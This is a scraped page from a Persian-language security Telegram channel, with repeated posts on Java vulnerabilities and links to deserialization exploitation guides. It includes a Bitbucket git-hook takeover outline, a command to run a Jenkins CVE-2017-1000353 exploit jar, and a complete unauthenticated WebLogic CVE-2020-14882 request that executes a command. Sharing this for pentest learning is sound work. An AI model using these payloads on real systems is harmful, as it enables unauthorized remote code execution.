This media is not supported in your browser
VIEW IN TELEGRAM
How to gain control of #Bitbucket with a TAR archive:
1. An attacker with permissions clones a repository from Bitbucket
2. He uploads a malicious TAR archive as an attachment
3. The import of the archive is triggered
4. After the import of the archive, the malicious git hook is dropped to the repository
5. He creates, adds and commits a file to the repository
6. After pushing, the malicious Git hook is being executed and sensitive data is compromised.
#web
#java
#pentest
@sec_nerd
1. An attacker with permissions clones a repository from Bitbucket
2. He uploads a malicious TAR archive as an attachment
3. The import of the archive is triggered
4. After the import of the archive, the malicious git hook is dropped to the repository
5. He creates, adds and commits a file to the repository
6. After pushing, the malicious Git hook is being executed and sensitive data is compromised.
#web
#java
#pentest
@sec_nerd
CVE-2017-1000353-1.1-SNAPSHOT-all.jar
1.3 MB
اکسپلویت اجرای دستور از راه دور بر روی Jenkins
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
python3 https://exploit.py https://ip:8080 jenkins_poc.se
https://github.com/vulhub/CVE-2017-1000353
فیلم :
https://asciinema.org/a/pB9D79yD8GVFQYYRKtW88hqm8
#jenkins
#java
#exploit
#rce
@sec_nerd
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
python3 https://exploit.py https://ip:8080 jenkins_poc.se
https://github.com/vulhub/CVE-2017-1000353
فیلم :
https://asciinema.org/a/pB9D79yD8GVFQYYRKtW88hqm8
#jenkins
#java
#exploit
#rce
@sec_nerd
یک کد جاوا که در پاسخ به یک سوال در stackoverflow منتشر شده بود و در بیش از ۶ هزار پروژه ی گیت هاب مورد استفاده قرار گرفته است، دچار مشکل امنیتی است!
نویسنده ی این کد که یکی از کاربران عالی رتبه در وبسایت stackoverflow است پس از خواندن مقاله ای که سال قبل منتشر شد، متوجه این موضوع گردید و کد را در وبلاگ شخصی خود اصلاح نمود.
https://www.zdnet.com/article/the-most-copied-stackoverflow-java-code-snippet-contains-a-bug/
#news
#dev
#java
@sec_nerd
نویسنده ی این کد که یکی از کاربران عالی رتبه در وبسایت stackoverflow است پس از خواندن مقاله ای که سال قبل منتشر شد، متوجه این موضوع گردید و کد را در وبلاگ شخصی خود اصلاح نمود.
https://www.zdnet.com/article/the-most-copied-stackoverflow-java-code-snippet-contains-a-bug/
#news
#dev
#java
@sec_nerd
ZDNet
The most copied StackOverflow Java code snippet contains a bug
Nine years later, developer corrects code snippet.
اسکنر آسیب پذیری های ثبت شده از Weblogic
https://github.com/0xn0ne/weblogicScanner
#java
#weblogic
@sec_nerd
https://github.com/0xn0ne/weblogicScanner
#java
#weblogic
@sec_nerd
GitHub
GitHub - 0xn0ne/weblogicScanner: weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017…
weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-32...
امنیت اطلاعات
CVE-2020-7961 liferay-portal RCE: Unauthenticated Remote code execution via JSONWS (LPS-97029) https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html #liferay #pentest @sec_nerd
آنالیز فنی آسیب پذیری کشف شده در Liferay
CVE-2020–7961
https://medium.com/@knownsec404team/liferay-portal-json-web-service-deserialization-vulnerability-cve-2020-7961-analysis-ca9f24478274
#liferay
#rce
#java
@sec_nerd
CVE-2020–7961
https://medium.com/@knownsec404team/liferay-portal-json-web-service-deserialization-vulnerability-cve-2020-7961-analysis-ca9f24478274
#liferay
#rce
#java
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-10199
Nexus Repository Manager 3 RCE
https://mp.weixin.qq.com/s/0dvhRwVCSwu1U6TbK4YvaQ
#rce
#java
@sec_nerd
Nexus Repository Manager 3 RCE
https://mp.weixin.qq.com/s/0dvhRwVCSwu1U6TbK4YvaQ
#rce
#java
@sec_nerd
برای یادگیری حملات deserialization
کلیات:
0️⃣https://blog.detectify.com/2018/03/21/owasp-top-10-insecure-deserialization/
جاوا:
0️⃣https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
1️⃣https://www.studytonight.com/java/serialization-and-deserialization.php
پیاده سازی حملات در burp برای جاوا:
0️⃣https://blog.netspi.com/java-deserialization-attacks-burp/
1️⃣https://github.com/PortSwigger/java-serial-killer
2️⃣https://github.com/summitt/burp-ysoserial
نمونه جاوایی:
0️⃣https://medium.com/abn-amro-red-team/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef
دات نت و ریموتینگ در باینری:
0️⃣https://github.com/tyranid/ExploitRemotingService
دات نت و soap:
0️⃣https://github.com/nccgroup/VulnerableDotNetHTTPRemoting
دات نت بصورت عمومی:
0️⃣https://github.com/pwntester/ysoserial.net/blob/master/README.md
php:
https://nickbloor.co.uk/2018/02/28/popping-wordpress/
نمونه برای php:
0️⃣https://blog.checkpoint.com/wp-content/uploads/2016/08/Exploiting-PHP-7-unserialize-Report-160826.pdf
دو نمونه برای nodejs:
0️⃣https://medium.com/bugbountywriteup/celestial-a-node-js-deserialization-hackthebox-walk-through-c71a4da14eaa
1️⃣https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
پایتون:
0️⃣https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
1️⃣https://docs.python.org/3/library/pickle.html
اپلیکیشن آسیب پذیری پایتونی:
0️⃣https://github.com/TheBlusky/pickle-prick
نمونه برای پایتون:
0️⃣https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
1️⃣https://www.journaldev.com/15638/python-pickle-example
چیت شیت:
0️⃣https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
credits:soroush dalili, Nishith K
#deserialization
#java #dotnet
#php #python #burpsuite #writeup #web #pentest
@sec_nerd
کلیات:
0️⃣https://blog.detectify.com/2018/03/21/owasp-top-10-insecure-deserialization/
جاوا:
0️⃣https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
1️⃣https://www.studytonight.com/java/serialization-and-deserialization.php
پیاده سازی حملات در burp برای جاوا:
0️⃣https://blog.netspi.com/java-deserialization-attacks-burp/
1️⃣https://github.com/PortSwigger/java-serial-killer
2️⃣https://github.com/summitt/burp-ysoserial
نمونه جاوایی:
0️⃣https://medium.com/abn-amro-red-team/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef
دات نت و ریموتینگ در باینری:
0️⃣https://github.com/tyranid/ExploitRemotingService
دات نت و soap:
0️⃣https://github.com/nccgroup/VulnerableDotNetHTTPRemoting
دات نت بصورت عمومی:
0️⃣https://github.com/pwntester/ysoserial.net/blob/master/README.md
php:
https://nickbloor.co.uk/2018/02/28/popping-wordpress/
نمونه برای php:
0️⃣https://blog.checkpoint.com/wp-content/uploads/2016/08/Exploiting-PHP-7-unserialize-Report-160826.pdf
دو نمونه برای nodejs:
0️⃣https://medium.com/bugbountywriteup/celestial-a-node-js-deserialization-hackthebox-walk-through-c71a4da14eaa
1️⃣https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
پایتون:
0️⃣https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
1️⃣https://docs.python.org/3/library/pickle.html
اپلیکیشن آسیب پذیری پایتونی:
0️⃣https://github.com/TheBlusky/pickle-prick
نمونه برای پایتون:
0️⃣https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
1️⃣https://www.journaldev.com/15638/python-pickle-example
چیت شیت:
0️⃣https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html
credits:soroush dalili, Nishith K
#deserialization
#java #dotnet
#php #python #burpsuite #writeup #web #pentest
@sec_nerd
Detectify Blog
OWASP TOP 10: Insecure Deserialization - Detectify Blog
Insecure Deserialization is one of the vulnerabilities on OWASP‘s Top 10 list and allows attackers to transfer a payload using serialized objects. This happens when integrity checks are not in place and deserialized data is not sanitized or validated.
👍1
امنیت اطلاعات
برای یادگیری حملات deserialization کلیات: 0️⃣https://blog.detectify.com/2018/03/21/owasp-top-10-insecure-deserialization/ جاوا: 0️⃣https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ 1️⃣https://www.studytonight.com/java/serialization-and…
https://www.rapid7.com/research/report/exploiting-jsos/
Java Serialization: A Practical Exploitation Guide
#deserialization
#java #dotnet
#php #python #burpsuite #writeup #web #pentest
@sec_nerd
Java Serialization: A Practical Exploitation Guide
#deserialization
#java #dotnet
#php #python #burpsuite #writeup #web #pentest
@sec_nerd
Rapid7
Rapid7 Labs - Trusted Cybersecurity Research
Java Deserialization Exploitation With
Customized Ysoserial Payloads
https://rhinosecuritylabs.com/research/java-deserializationusing-ysoserial/
#java
#deserialization
#rce
@sec_nerd
Customized Ysoserial Payloads
https://rhinosecuritylabs.com/research/java-deserializationusing-ysoserial/
#java
#deserialization
#rce
@sec_nerd
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
امنیت اطلاعات
آسیب پذیری RCE در weblogic بدون نیاز به احراز هویت CVE-2020–14882 https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal POST: _nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime(…
GitHub
GitHub - jas502n/CVE-2020-14882: CVE-2020–14882、CVE-2020–14883
CVE-2020–14882、CVE-2020–14883. Contribute to jas502n/CVE-2020-14882 development by creating an account on GitHub.
Testing and exploiting Java Deserialization in 2021
https://afinepl.medium.com/testing-and-exploiting-java-deserialization-in-2021-e762f3e43ca2
#java
#rce
#deserialization
@sec_nerd
https://afinepl.medium.com/testing-and-exploiting-java-deserialization-in-2021-e762f3e43ca2
#java
#rce
#deserialization
@sec_nerd